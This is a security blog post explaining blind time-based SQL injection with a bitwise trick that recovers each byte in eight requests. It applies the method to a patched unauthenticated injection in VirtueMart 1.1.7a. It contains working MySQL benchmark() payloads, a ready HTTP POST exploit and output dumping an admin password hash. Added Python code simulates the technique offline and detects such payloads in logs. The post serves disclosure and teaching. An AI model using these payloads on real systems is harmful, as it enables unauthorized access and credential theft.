Tuesday, 25 August 2020

Bit Banging Your Database

This post is about stealing data from a database one bit at a time. Most of the time pulling data out of a database a bit at a time would be neither ideal nor desirable, but in certain cases it works just fine, for instance when dealing with a blind, time-based SQL injection. To bring anyone who is not aware of what a "blind time-based" SQL injection is up to speed: this is a condition where it is possible to inject into a SQL statement that the database executes, but the application gives no indication of the query's result. It is normally exploited by injecting boolean statements into the query and making the database pause for a predetermined amount of time before returning a response, so the delay reveals whether the statement was true. Think of it as playing a game of "Guess Who" with the database.

Now that the basic idea is out of the way we can move on to how this is normally done, and then onto the target of this post. Normally a sensitive item in the database is targeted, such as a username and password. Once we know where this item lives in the database we first determine its length, for example the length of an administrator's username. All examples below are executed against a MySQL database hosting a Joomla install, so we would want to run a query like the following:
select length(username) from jos_users where usertype = 'Super Administrator';
Because we can't get the value back directly, we have to issue queries like the following iteratively, one candidate length per request:

select if(length(username)=1,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
select if(length(username)=2,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
We keep incrementing the number we compare the username length against until the database pauses (the benchmark function is hit). In this case it takes 5 requests until our statement is true and the benchmark runs.

Examples showing the time difference:

mysql> select if(length(username)=1,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
1 row in set (0.00 sec)

mysql> select if(length(username)=5,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
1 row in set (0.85 sec)
Now in the case of the password, the field is 65 characters long, so discovering its length with the same technique would require 65 requests. This is where we get to the topic of the post: we can actually determine the length of any field in only 8 requests (for lengths up to 255). By querying the value bit by bit, we can determine whether each bit is set or not, again using a boolean statement. We will use a bitwise AND to test each bit of our value:

Start by checking the most significant bit and continue down to the least significant bit; the value is 65:

value & 128
01000001
10000000
--------
00000000

value & 64
01000001
01000000
--------
01000000

value & 32
01000001
00100000
--------
00000000

value & 16
01000001
00010000
--------
00000000

value & 8
01000001
00001000
--------
00000000

value & 4
01000001
00000100
--------
00000000

value & 2
01000001
00000010
--------
00000000

value & 1
01000001
00000001
--------
00000001
The non-zero results (value & 64 and value & 1) are where a bit is set (1); a non-zero result is also what satisfies our boolean statement and identifies a 'true' query. The following example shows the previous computation being executed on the database; we identify the set bits by running a benchmark that makes the database pause:

mysql> select if(length(password) & 128,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 64,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (7.91 sec)

mysql> select if(length(password) & 32,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 16,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 8,benchmark(50000000,md5('cc')),0)  from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 4,benchmark(50000000,md5('cc')),0)  from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 2,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 1,benchmark(50000000,md5('cc')),0)  from jos_users;
1 row in set (8.74 sec)
As you can see, whenever the boolean statement is satisfied we get a delay in the response, so we mark that bit as set (1) and all others as unset (0). This gives us 01000001, or 65. Now that we know how long our target value is, we can move on to extracting the value itself from the database. Normally this is done with a substring function to walk through the value character by character. At each offset we test the character against a list of candidate characters until our boolean statement is satisfied, indicating we have found the correct one. An example of this:

select if(substring(password,1,1)='a',benchmark(50000000,md5('cc')),0) as query from jos_users;
This works, but how the character set you search with is set up affects how many requests it takes to find a character, especially when dealing with case-sensitive values. Consider the following password hash:
da798ac6e482b14021625d3fad853337skxuqNW1GkeWWldHw6j1bFDHR4Av5SfL
If you searched for this string a character at a time using the character set [0-9A-Za-z], it would take about 1400 requests. If we apply our previous method and extract a bit at a time, we only make 520 requests (65*8). The following example shows the extraction of the first character of this password:

mysql> select if(ord(substring(password,1,1)) & 128,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)

mysql> select if(ord(substring(password,1,1)) & 64,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (7.91 sec)

mysql> select if(ord(substring(password,1,1)) & 32,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (7.93 sec)

mysql> select if(ord(substring(password,1,1)) & 16,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)

mysql> select if(ord(substring(password,1,1)) & 8,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)

mysql> select if(ord(substring(password,1,1)) & 4,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (7.91 sec)

mysql> select if(ord(substring(password,1,1)) & 2,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)

mysql> select if(ord(substring(password,1,1)) & 1,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
The requests where the bit was set are again the ones that produced a delay (the & 64, & 32 and & 4 queries). According to these queries the value is 01100100 (100), which is 'd'. The substring offset is then incremented and the next character found, until we reach the length of the value that we found earlier.
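To make the arithmetic behind both the length recovery above and the per-character extraction concrete, here is an added Python simulation (it is not the post's vm_own.py and sends nothing over the network). A constructed TimingOracle stands in for the database and answers the same yes/no questions the queries above ask (length(x) & mask, ord(substring(x,i,1)) & mask, substring(x,i,1) = c), counting how many were asked; the test string is the hash quoted earlier in the post. It shows why the request budget is exactly 8 per byte regardless of the character, and it recomputes the request count of the character-scan approach for the [0-9A-Za-z] ordering so the two numbers given above can be checked.

```python
import string


class TimingOracle:
    """Stand-in for the database (constructed for this example): answers the
    same boolean questions the benchmark() queries above ask and counts them.
    Characters are assumed to be single-byte, as MySQL's ord() on one byte."""

    def __init__(self, secret):
        self._secret = secret
        self.queries = 0

    def length_bit(self, mask):
        # mirrors: select if(length(secret) & mask, benchmark(...), 0)
        self.queries += 1
        return bool(len(self._secret) & mask)

    def char_bit(self, offset, mask):
        # mirrors: select if(ord(substring(secret, offset, 1)) & mask, ...)
        # offset is 1-based like MySQL's substring()
        self.queries += 1
        return bool(ord(self._secret[offset - 1]) & mask)

    def char_is(self, offset, ch):
        # mirrors: select if(substring(secret, offset, 1) = ch, benchmark(...), 0)
        self.queries += 1
        return self._secret[offset - 1] == ch


def recover_byte(ask):
    """Rebuild one byte from eight yes/no answers, most significant bit first.
    ask(mask) returns True when value & mask is non-zero (the delayed response)."""
    value = 0
    for mask in (128, 64, 32, 16, 8, 4, 2, 1):
        if ask(mask):
            value |= mask
    return value


def recover_by_bits(oracle):
    """8 questions for the length (covers 0..255), then 8 per character."""
    length = recover_byte(oracle.length_bit)
    chars = [chr(recover_byte(lambda m, i=i: oracle.char_bit(i, m)))
             for i in range(1, length + 1)]
    return "".join(chars)


def recover_by_scan(oracle, charset):
    """The classic approach: try every candidate character at each offset."""
    length = recover_byte(oracle.length_bit)
    out = []
    for i in range(1, length + 1):
        for ch in charset:
            if oracle.char_is(i, ch):
                out.append(ch)
                break
        else:
            # a character outside the charset can never be found this way
            raise ValueError(f"character at offset {i} is not in the charset")
    return "".join(out)


def compare(secret, charset=string.digits + string.ascii_uppercase + string.ascii_lowercase):
    """Recover `secret` both ways and return (bitwise queries, scan queries)."""
    bits = TimingOracle(secret)
    if recover_by_bits(bits) != secret:
        raise RuntimeError("bitwise recovery failed")
    scan = TimingOracle(secret)
    if recover_by_scan(scan, charset) != secret:
        raise RuntimeError("scan recovery failed")
    return bits.queries, scan.queries


if __name__ == "__main__":
    # the 64-character hash quoted in the post
    HASH = "da798ac6e482b14021625d3fad853337skxuqNW1GkeWWldHw6j1bFDHR4Av5SfL"
    print("65 ->", format(recover_byte(lambda m: bool(65 & m)), "08b"))
    print("bitwise vs scan queries:", compare(HASH))
```

The bitwise path costs 8 (length) + 8 per character, so 520 for the 64-character hash, while the scan path depends entirely on where each character sits in the ordering: digits are cheap, lowercase letters cost up to 62 questions each, which is where the "about 1400" figure comes from.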

Now that the brief lesson is over we can move on to actually exploiting something using this technique. Our target is Virtuemart. Virtuemart is a free shopping cart module for the Joomla platform. A while back I had found an unauthenticated SQL injection vulnerability in version 1.1.7a. This issue was fixed promptly by the vendor (...I was amazed) in version 1.1.8. The offending code was located in "$JOOMLA/administrator/components/com_virtuemart/notify.php":

if($order_id === "" || $order_id === null)
{
        $vmLogger->debug("Could not find order ID via invoice");
        $vmLogger->debug("Trying to get via TransactionID: ".$txn_id);

        $qv = "SELECT * FROM `#__{vm}_order_payment` WHERE `order_payment_trans_id` = '".$txn_id."'";
        $db->query($qv);
        print($qv);
        if( !$db->next_record()) {
                $vmLogger->err("Error: No Records Found.");
        }
}
The $txn_id variable is set from a POST parameter of the same name and is concatenated straight into the query, so the following request will cause the web server to delay before returning:


POST /administrator/components/com_virtuemart/notify.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

invoice=1&txn_id=1' or benchmark(50000000,md5('cc'));#
Now that an injection point has been identified, we can automate the extraction of the "Super Administrator" account from the system:
python vm_own.py "http://192.168.18.131/administrator/components/com_virtuemart/notify.php"
[*] Getting string length
[+] username length is:5
[+] username:admin
[*] Getting string length
[+] password length is:65
[+] password:da798ac6e482b14021625d3fad853337:skxuqNW1GkeWWldHw6j1bFDHR4Av5SfL
The "vm_own.py" script can be downloaded here.
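From the defender's side, the request above leaves two distinct traces: the payload itself (a benchmark() or sleep() call inside a form parameter) and the timing shape of the extraction, a burst of near-identical requests from one client to one endpoint whose response times split into "instant" and "several seconds". The following added Python example (not from the original post) runs both checks over constructed log lines in a proxy/WAF-style format that records the decoded request body and the response time; the field layout, IP addresses and timestamps are assumptions made up for the example.

```python
import re
from collections import defaultdict

# Constructed log lines (not from the original post). Tab-separated fields:
# timestamp, client, method, path, decoded body, response time in seconds.
# The first five mimic the bit-by-bit length queries shown earlier.
SAMPLE_LOG = """\
2020-08-25T10:00:01Z\t10.0.0.5\tPOST\t/administrator/components/com_virtuemart/notify.php\tinvoice=1&txn_id=1' or if(length(password) & 128,benchmark(50000000,md5('cc')),0);#\t0.01
2020-08-25T10:00:02Z\t10.0.0.5\tPOST\t/administrator/components/com_virtuemart/notify.php\tinvoice=1&txn_id=1' or if(length(password) & 64,benchmark(50000000,md5('cc')),0);#\t7.91
2020-08-25T10:00:10Z\t10.0.0.5\tPOST\t/administrator/components/com_virtuemart/notify.php\tinvoice=1&txn_id=1' or if(length(password) & 32,benchmark(50000000,md5('cc')),0);#\t0.02
2020-08-25T10:00:11Z\t10.0.0.5\tPOST\t/administrator/components/com_virtuemart/notify.php\tinvoice=1&txn_id=1' or if(length(password) & 16,benchmark(50000000,md5('cc')),0);#\t0.01
2020-08-25T10:00:12Z\t10.0.0.5\tPOST\t/administrator/components/com_virtuemart/notify.php\tinvoice=1&txn_id=1' or if(length(password) & 1,benchmark(50000000,md5('cc')),0);#\t8.74
2020-08-25T10:00:13Z\t192.168.1.20\tGET\t/index.php\t\t0.02
2020-08-25T10:00:14Z\t192.168.1.20\tPOST\t/administrator/components/com_virtuemart/notify.php\tinvoice=1044&txn_id=8XK12345AB\t0.03
"""

# Functions that exist only to make the database wait; seeing one in user input
# is a strong indicator of time-based injection.
TIME_BASED_PATTERNS = re.compile(r"\b(benchmark|sleep|pg_sleep)\s*\(", re.IGNORECASE)


def parse_log(text):
    """Turn the tab-separated lines into dicts; response time becomes a float."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, path, body, rt = line.split("\t")
        records.append({"ts": ts, "client": client, "method": method,
                        "path": path, "body": body, "rt": float(rt)})
    return records


def payload_indicators(body):
    """Sorted list of delay functions found in a decoded request body."""
    return sorted({m.group(1).lower() for m in TIME_BASED_PATTERNS.finditer(body)})


def timing_anomalies(records, min_requests=4, slow=2.0, fast=0.5):
    """Flag (client, path) pairs that produce both instant and multi-second
    responses: a bit-by-bit extraction alternates between the two."""
    groups = defaultdict(list)
    for r in records:
        groups[(r["client"], r["path"])].append(r["rt"])
    findings = {}
    for key, times in groups.items():
        if len(times) < min_requests:
            continue
        slow_n = sum(t >= slow for t in times)
        fast_n = sum(t <= fast for t in times)
        if slow_n and fast_n:
            findings[key] = {"requests": len(times), "slow": slow_n, "fast": fast_n}
    return findings


def analyse(text):
    """Run both detections and return their results together."""
    records = parse_log(text)
    keyword_hits = []
    for r in records:
        hits = payload_indicators(r["body"])
        if hits:
            keyword_hits.append((r["client"], r["path"], hits))
    return {"keyword_hits": keyword_hits, "timing": timing_anomalies(records)}


if __name__ == "__main__":
    result = analyse(SAMPLE_LOG)
    for client, path, hits in result["keyword_hits"]:
        print(f"payload indicator {hits} from {client} on {path}")
    for (client, path), info in result["timing"].items():
        print(f"timing pattern from {client} on {path}: {info}")
```

The keyword check catches this particular payload, but an attacker can obfuscate function names, so the timing check is the more robust of the two: it needs no knowledge of the payload, only that the same client keeps hitting the same endpoint with responses that cluster at two very different durations. The root cause in the code above is the unescaped concatenation of $txn_id into the SQL string; escaping or binding that parameter removes the injection entirely, which is what the 1.1.8 fix amounts to.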
